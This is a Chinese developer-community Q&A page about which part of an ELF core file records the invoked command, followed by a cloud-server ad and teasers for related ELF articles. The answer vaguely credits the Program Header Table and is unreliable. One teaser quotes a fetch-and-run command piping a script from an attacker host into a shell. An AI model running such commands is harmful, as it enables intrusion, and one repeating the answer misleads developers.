开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

在ELF核心文件中，哪个部分存储了所调用命令的信息？

在ELF核心文件中，存储了所调用命令的信息的部分是Program Header Table（程序头表）。Program Header Table是ELF文件中的一个数据结构，它包含了程序加载和执行所需的各种信息，包括可执行文件的段（Segment）信息、动态链接器的信息、共享库的信息等。Program Header Table中的每个条目描述了一个段的属性和位置，其中包括段的类型、大小、内存对齐方式、文件偏移量等信息。通过解析Program Header Table，系统可以获取到ELF文件中所调用命令的信息，从而正确加载和执行程序。

推荐的腾讯云相关产品：腾讯云云服务器（CVM）腾讯云云服务器（CVM）是一种弹性计算服务，提供了多种规格的云服务器实例供用户选择。用户可以根据自己的需求选择合适的配置和操作系统，快速创建和管理云服务器。腾讯云云服务器支持多种操作系统，包括Linux和Windows，提供了丰富的网络和存储选项，可以满足不同应用场景的需求。

产品介绍链接地址：https://cloud.tencent.com/product/cvm

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

内核级木马与病毒攻防：Linux可执行文件的ELF格式描述

要想在Linux系统上实现逆向工程，分析，设计或查杀病毒和恶意代码，你不得不深入掌握其可执行文件的ELF格式，这样你才能了解进程在内存空间的布局和运行的基本规律，这样你才能有针对性的设计有效的病毒或恶意代码入侵系统。

01

详解ELF重定向原理

重定向是计算机技术中非常底层的概念和操作。它指的是将程序中涉及到的变量名与变量在计算机内存中的位置关联起来。当在代码中执行类似x=1;的语句时，编译器需要通过重定向信息找到变量x对应的内存位置，然后将数值1写入该内存，因此重定向既跟程序的加载链接有关，又与编译原理有关，因此对计算机体系结构不了解，或只关注上层应用开发，对底层技术理解不多的同学对它进行掌握就会有些困难。

02

linux常用命令--开发调试篇

Linux常用命令中有一些命令可以在开发或调试过程中起到很好的帮助作用，有些可以帮助了解或优化我们的程序，有些可以帮我们定位疑难问题。本文将简单介绍一下这些命令。

03

探索ELF可执行文件的“干货”:段头表和段的基本介绍

可执行文件的数据结构通常都很复杂和繁琐。原因在于程序在加载到内存中执行时需要经过一系列非常复杂的步骤。例如要计算数据或代码被加载到虚拟内存时的位置，计算重定向数值，实现不同代码的链接等。

02

[linux][elf]ELF格式分析与常用工具以及不常见问题

前言： ELF只linux是最常用的可执行文件格式，这里简单分析一下ELF格式，介绍几个常用命令，并分享几个不常见的问题。分析： 1，dynamically link 老习惯，从“Hello W

07

trace32 for rt-thread support

Lauterbach是全球最大的、完整的、模块化和可升级微处理器开发工具的生产商，自1979年以来，在制造世界一流的调试器和实时跟踪方面拥有丰富经验。其中产品线中的TRACE32为大众广为所知，是众多手机厂商、芯片厂商的必备工具。

04

Debug常用命令：

确保安装了GNU工具链：打开终端并运行以下命令，以确保你安装了所需的工具链（汇编器和链接器）：

01

Debug常用命令：

确保安装了GNU工具链：打开终端并运行以下命令，以确保你安装了所需的工具链（汇编器和链接器）：

01

【胖虎的逆向之路】——GOT/PLT Hook详解&针对自定义so库的Hook实操

随着 Android 开发的技术宽度不断向 native 层扩展，Native hook 已经被用于越来越多的业务场景中，之前作者一直游离于Java层面的逆向，后来工作使然，接触到了Native 层的Hook，熟悉了ELF的文件结构&GOT/PLT&In Line Hook的相关知识和实际操作，Android Native Hook 的实现方式有很多种，我们接下来要讲的是 GOT/PLT Hook （篇幅略略略长，阅读时长约 20 min ）

04

ELF文件程序表头和代码实现ELF文件加载

前面章节我们了解了ELF文件的头部结构，这次我们深入了解另一个非常重要的数据结构，那就是程序表头。操作系统严重依赖该结构来加载ELF文件或是实现动态链接。程序表头反映的是当ELF加载到内存后所形成的“视图”或结构，也就是说ELF文件存在硬盘上或者被加载到内存，它展现出来的形态不一致。

03

Linux下开发stm32 ①

这是为了给接下来的Linux下嵌入式开发打好基础，尽快熟悉Linux下c编程，但是在开发stm32的时候，编译工具链要使用gcc-arm-none-eabi，为什么不是gcc呢？这就要说到linux下的交叉编译了，因为我们要在PC机上编译出可以运行在ARM上的程序，使用gcc编译出的是在PC上运行的程序，所以我们要使用gcc-arm-none-eabi进行交叉编译~

03

程序的编译、链接、装载与运行

在Linux操作系统中，一段C程序从被写下到最终被CPU执行，要经过一段漫长而又复杂的过程。下图展示了这个过程

01

ELF文件格式简介

可执行与可链接格式（Executable and Linkable Format，ELF），常被称为 ELF格式，是一种用于可执行文件、目标代码、共享库和核心转储（core dump）的标准文件格式，一般用于类Unix系统，比如Linux，Macox等。ELF 格式灵活性高、可扩展，并且跨平台。比如它支持不同的字节序和地址范围，所以它不会不兼容某一特别的 CPU 或指令架构。这也使得 ELF 格式能够被运行于众多不同平台的各种操作系统所广泛采纳。 ELF文件一般由三种类型的文件：

03

第48章 MDK的编译过程及文件类型全解（1）

全套200集视频教程和1000页PDF教程请到秉火论坛下载：www.firebbs.cn

01

Linux无文件渗透执行ELF

注：本文仅用于知识分享，请勿用于非法攻击，任何后果与本团队无关。 01 简介在进行Linux系统的攻击应急时，大家可能会查看pid以及/proc相关信息，比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令，通过/proc/$pid/exe抓样本等，但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢？最近看了一篇@MagisterQuis写的文章https://magisterquis.githu

08

Polypyus：一款功能强大的固件源码分析工具

Polypyus Polypyus支持从相似的二进制文件中提取出已知函数，并以此来学习如何再原始二进制文件中定位函数。该工具是一个固件源码分析工具，它不需要对二进制文件进行反汇编，这就是它的一个很大的优势，因为有些二进制文件的反汇编是比较困难的。除此之外，该工具仅对二进制源码进行分析，因此它的执行速度非常快，在几秒钟之内即可完成。但是，该工具所使用的方法要求二进制文件使用相同的体系结构，并且具有类似的编译器选项。 Polypyus支持集成到现有工具的工作流中，比如说Ghidra、IDA、BinDiff和Di

00

链接加载原理及ELF文件格式

作者简介：伟林，中年码农，从事过电信、手机、安全、芯片等行业，目前依旧从事Linux方向开发工作，个人爱好Linux相关知识分享。原理概述为什么要研究链接和加载？写一个小的main函数用户态程序，或者是一个小的内核态驱动ko，都非常简单。但是这一切都是在gcc和linux内核的封装之上，你只是实现了别人提供的一个接口，至于程序怎样启动、怎样运行、怎样实现这些机制你都一无所知。接着你会对程序出现的一些异常情况束手无策，对内核代码中的一些用法不能理解，对makefile中的一些实现不知所云。所以这就是我们

02

一文读懂 | coredump文件是如何生成的

有些 BUG 是业务逻辑上的错误导致的，一般不会导致程序崩溃，例如：原本要将两个数相加，但不小心把这两个数相减，而导致结果出错。这时我们可以通过在程序中，使用 printf 这类输出函数来进行打点调试。

04

含大量图文解析及例程 | Linux下的ELF文件、链接、加载与库（中）

可执行文件的装载进程和装载的基本概念的介绍程序（可执行文件）和进程的区别程序是静态的概念，它就是躺在磁盘里的一个文件。进程是动态的概念，是动态运行起来的程序。现代操作系统如何装载可执行文件给进程分配独立的虚拟地址空间将可执行文件映射到进程的虚拟地址空间（mmap）将CPU指令寄存器设置到程序的入口地址，开始执行可执行文件在装载的过程中实际上如我们所说的那样是映射的虚拟地址空间，所以可执行文件通常被叫做映像文件(或者Image文件)。可执行ELF文件的两种视角可执行ELF格式具有不寻常的

02

readelf命令使用说明[通俗易懂]

大家好，我是架构君，一个会写代码吟诗的架构师。今天说一说readelf命令使用说明[通俗易懂],希望能够帮助大家进步!!!

03

Linux 程序编译过程的来龙去脉

大家肯定都知道计算机程序设计语言通常分为机器语言、汇编语言和高级语言三类。高级语言需要通过翻译成机器语言才能执行，而翻译的方式分为两种，一种是编译型，另一种是解释型，因此我们基本上将高级语言分为两大类，一种是编译型语言，例如C，C++，Java，另一种是解释型语言，例如Python、Ruby、MATLAB 、JavaScript。

03

Linux 程序编译过程详解

大家肯定都知道计算机程序设计语言通常分为机器语言、汇编语言和高级语言三类。高级语言需要通过翻译成机器语言才能执行，而翻译的方式分为两种，一种是编译型，另一种是解释型，因此我们基本上将高级语言分为两大类，一种是编译型语言，例如C，C++，Java，另一种是解释型语言，例如Python、Ruby、MATLAB 、JavaScript。

03

《程序员的自我修养》笔记

vma是指的不同段的地址入口，可以看到虽然段有很多，但是type类型大部分都一样，比如代码段类型分为了两个段描述更加细致；数据段更夸张用了五个段存储初始化了的变量

01

Linux 程序编译过程详解

大家肯定都知道计算机程序设计语言通常分为机器语言、汇编语言和高级语言三类。高级语言需要通过翻译成机器语言才能执行，而翻译的方式分为两种，一种是编译型，另一种是解释型，因此我们基本上将高级语言分为两大类，一种是编译型语言，例如C，C++，Java，另一种是解释型语言，例如Python、Ruby、MATLAB 、JavaScript。

03

认识目标文件的格式——a.out COFF PE ELF

目标文件是源代码编译后未进行链接的中间文件（Windows的.obj和Linux的.o），与可执行文件（Windows的.exe和Linux的ELF）的结构和内容相似，因此跟可执行文件采用同一种格式存储。PC平台常见的可执行文件格式主要有Windows的PE（Portable Executable）和Linux的ELF（Executable and Linkable Format）。PE和ELF都是通用目标文件格式（COFF，Common Object File Format）的变种。在Windows下，我们将目标文件与可执行文件统称为PE-COFF文件，Linux统称为ELF文件。除此之外，还有些不常用的目标文件与可执行文件格式，比如Intel和Microsoft以前使用的对象模型文件（OMF，Object Module File）、Unix的最初使用的a.out和MS-DOS的.COM格式等。

03

认识目标文件结构

目标文件是源代码编译但未链接的中间文件（Windows的.obj和Linux的.o），Windows的.obj采用 PE 格式，Linux 采用 ELF 格式，两种格式均是基于通用目标文件格式（COFF，Common Object File Format）变化而来，所以二者大致相同。本文以 Linux 的 ELF 格式的目标文件为例，进行介绍。

03

Linux下开发stm32 ③ | 寄存器工程开发

前两篇我们介绍了如何创建一个空的裸机工程（只有启动文件和main文件），并编译工程生成elf文件，然后将其转为bin格式或hex格式，使用openocd下载，最后编写了一个makefile雏形，并成功点亮了一个LED~ 但是这个LED我们是通过指针直接操作寄存器地址来完成的，接下来，我们在此基础上，引入stm32头文件，其中包含了寄存器的宏定义，也就是使用寄存器进行开发~

03

Linux可执行文件与进程的虚拟地址空间

一个可执行文件被执行的同时也伴随着一个新的进程的创建。Linux会为这个进程创建一个新的虚拟地址空间，然后会读取可执行文件的文件头，建立虚拟地址空间与可执行文件的映射关系，然后将CPU的指令指针寄存器设置成可执行文件的入口地址，然后CPU就会从这里取指令执行。

03

Linux上一个恶意程序分析实例:一步一步揭开病毒程序的面纱

本节我们结合前面的知识点，通过动手实践来分析一个”恶意“程序。这次我们使用的例子具有极强的动手实践性，它也非常能代表恶意程序入侵系统的很多流程步骤，跟着做下来你一定收获颇多。

01

浅析C++内存布局

简单总结下C++变量在内存中的布局和可执行文件相关的知识。暂未涉及虚函数，虚函数表，类的继承和多态等C++对象的内存模型。对象的内存模型推荐经典书籍《深度探索C++对象模型》，豆瓣评分9.1。

04

万字图文 | 你写的代码是如何跑起来的？

我们在写完代码后，进行简单的编译，然后在 shell 命令行下就可以把它启动起来。

03

Shell命令（readelf）

今天翻翻老本，翻到一款上天入地的神器 —— readelf，据说用它可以拂开云雾，抽丝剥茧，去伪存真，深入其里。它就像一把精工刀，专用于对ELF格式文件进行外科手术般的解剖，今天我们来见识见识。

02

手把手编译基于恩智浦MCAL的工程

打开EB工具，导入例程，点file->import 按照路径导入就可以。我这里已经导入

03

Go每日一库之154：eCapture（无需CA证书抓包https）

eCapture是一款基于eBPF技术实现的用户态数据捕获工具。不需要CA证书，即可捕获https/tls的通讯明文。

02

全志 V85x E907 RISC-V小核开发与使用

v85x 平台包括了 V853, V853s, V851s, V851se。 s后缀代表芯片内封了DDR内存，e后缀代表芯片内封 ephy。拥有 Cortex-A7 core@900MHz, RISC-V@600MHz 和一个 0.5TOPS（VIP9000PICO_PID0XEE, 567MACS, 576 x 348M x 2 ≈ 500GOPS）的 NPU。其中的 RISC-V 小核心为平头哥玄铁E907

01

GOT段在linux系统中实现代码动态加载的作用和其他段的说明

上一节我们看到，当程序想调用系统函数时，在编译阶段无法确认被调用函数所在的虚拟地址。因此必须有机制让程序在运行过程中，在调用系统API的时候有办法去确定所调用的系统函数对应的入口地址，这就是代码运行时对应动态加载的过程。

02

详解 Linux 可执行文件 ELF 文件的内部结构

上一篇文章中，我们介绍了如何让汇编语言与 C 语言相互调用：如何实现汇编语言与 C 语言之间的相互调用

02

全志D1s裸机开发之体验第一个程序

然后在 Git Bash 中执行 make 命令，可以生成 benos_payload.bin 文件，如下图所示：

01

XV6操作系统代码阅读心得（一）：启动加载、中断与系统调用

大家好，我是架构君，一个会写代码吟诗的架构师。今天说一说XV6操作系统代码阅读心得（一）：启动加载、中断与系统调用,希望能够帮助大家进步!!!

02

有了这 27 个Linux 技巧，让你工作效率翻倍！

今天给大家分享 27 个实用的 Linux 技巧，对于一些经常在 Linux 操作系统下玩的重度爱好者，可以有效的提高你的工作效率。

01

arm裸板驱动总结(makefile+lds链接脚本+裸板调试)

在裸板2440中,当我们使用nand启动时,2440会自动将前4k字节复制到内部sram中,如下图所示: 然而此时的SDRAM、nandflash的控制时序等都还没初始化,所以我们就只能使用前0~40

09

Trace32 simulator调试以及简单实用命令介绍

熟悉高通平台的童鞋可能会比较熟悉，高通有ramdump功能，当系统crash后通过warm reset重启来抓取ram中的数据，然后利用Trace32进行故障现场的查看来排查问题。这实际上用到的就是trace32的simulator功能，也就是仿真器功能，我们只需要获取到设备的内存快照来进行指令集的仿真，以此查看故障现场，而不用真实的连接目标板来实时调试。

01

.NET5.0 单文件发布打包操作深度剖析

随着 .NET5.0 Preview 8 的发布，许多新功能正在被社区成员一一探索；这其中就包含了“单文件发布”这个炫酷的功能，实际上，这也是社区一直以来的呼声，从 WinForm 的 msi 开始，我们就希望有这样一个功能，虽然在 docker 时代，单文件发布的功能显得“不那么重要”，但正是从这一点可以看出，.NET 的团队成员一直在致力于实用功能的完善。

01

Android so文件浅析「建议收藏」

一. 简述 Android中的so文件是动态链接库，是二进制文件，即ELF文件。多用于NDK开发中。

01

【编程基础】Linux环境开发效率--那些强大的命令

之前写了一篇关于linux下常用的几个命令，参考Linux入门--提高工作效率的命令。接下来接着介绍一些在linux下做开发经常使用到得命令，其中有打包压缩命令tar，文件查找命令find，文件内容查找命令grep，elf可执行文件分析工具readelf等。 1、打包压缩命令tar 在linux下经常会遇到给源码打包解压等，如果你还是用linux的X window来做那你就out了。下面是该工具的常用命令参数及运用举例：主要命令： -c 创建包 -x 解包 -t 列出包中的内容 -r 增加文件到指定包中

05

【基础必备】RAID阵列分类和进程管理常用指令

RAID阵列概述廉价冗余磁盘阵列 – Redundant Arrays of Inexpensive Disks – 通过硬件/软件技术,将多个较小/低速的磁盘整合成一　　个大磁盘 – 阵列的价值:提升I/O效率、硬件级别的数据冗余 – 不同RAID级别的功能、特性各不相同 RAID 0,条带模式 – 同一个文档分散存放在不同磁盘 – 并行写入以提高效率 RAID 1,镜像模式 – 一个文档复制成多份,分别写入不同磁盘 – 多份拷贝提高可靠性,效率无提升 RAID5,高性价比模式 – 相当于RAID0

05

《程序员的自我修养》第三章学习笔记

1，编译器编译源代码生成的文件叫做目标文件。从结构上说，是编译后的可执行文件，只不过还没有经过链接 3.1 目标文件的格式 1，可执行文件的格式： Windows下的PE 和 Linux下的ELF 2，从广义上说，目标文件与可执行文件的格式几乎是一样的，所以广义上可以将目标文件与可执行文件看成是一种类型的文件。 3，可执行文件，动态链接库，静态链接库都按照可执行文件格式存储（Windows下是 PE-COFF格式，Linux下是ELF格式）。 4，Linux下命令： $: file ***

06

扒一扒ELF文件

在介绍ELF文件之前，我们先看下，一个.c程序是如何变成可执行目标文件的。下面举个例子。

02

Hypervisor Necromancy；恢复内核保护器(1)

--[ 0 - 简介直到最近，为了在运行时攻击者破坏整个系统发现并利用内核漏洞。这使他们能够执行各种动作；在内核上下文中执行恶意代码，修改内核数据结构以提升权限，访问受保护的数据，等已经引入了各种缓解措施来防止此类动作和管理程序也被使用，除了他们的为实现这一目标而使用传统的虚拟化支持。在里面 ARM 虚拟化促进了 Android 生态系统扩展，允许供应商/OEM 实施自己的保护功能/逻辑。另一方面，Android 设备已普遍成为主要的 PITA 由于引入的 OEM 和供应商种类繁多，

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭